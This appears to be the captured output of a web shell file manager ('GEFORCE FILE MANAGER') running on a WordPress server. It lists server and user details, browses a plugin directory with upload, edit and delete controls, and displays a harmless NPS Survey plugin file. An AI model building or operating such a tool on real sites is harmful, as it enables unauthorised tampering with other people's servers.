[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
inc
/
lib
/
nps-survey
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 classes
SET
[ DEL ]
📁 dist
SET
[ DEL ]
📄 changelog.txt
4,228 B
SET
[ EDIT ]
|
[ DEL ]
📄 composer.json
1,219 B
SET
[ EDIT ]
|
[ DEL ]
📄 nps-survey-plugin-loader.php
1,980 B
SET
[ EDIT ]
|
[ DEL ]
📄 nps-survey.php
667 B
SET
[ EDIT ]
|
[ DEL ]
📄 nps-survey.zip
26,582 B
SET
[ EDIT ]
|
[ DEL ]
📄 version.json
28 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: nps-survey.php
<?php /** * Plugin Name: NPS Survey * Description: It is a nps survey library. * Author: Brainstorm Force * Version: 1.0.21 * License: GPL v2 * Text Domain: nps-survey * * @package {{package}} */ if ( ! defined( 'ABSPATH' ) ) { exit; } // Don't load if another instance is already loaded. if ( defined( 'NPS_SURVEY_FILE' ) ) { return; } define( 'NPS_SURVEY_FILE', __FILE__ ); define( 'NPS_SURVEY_BASE', plugin_basename( NPS_SURVEY_FILE ) ); define( 'NPS_SURVEY_DIR', plugin_dir_path( NPS_SURVEY_FILE ) ); define( 'NPS_SURVEY_URL', plugins_url( '/', NPS_SURVEY_FILE ) ); define( 'NPS_SURVEY_VER', '1.0.21' ); require_once 'nps-survey-plugin-loader.php';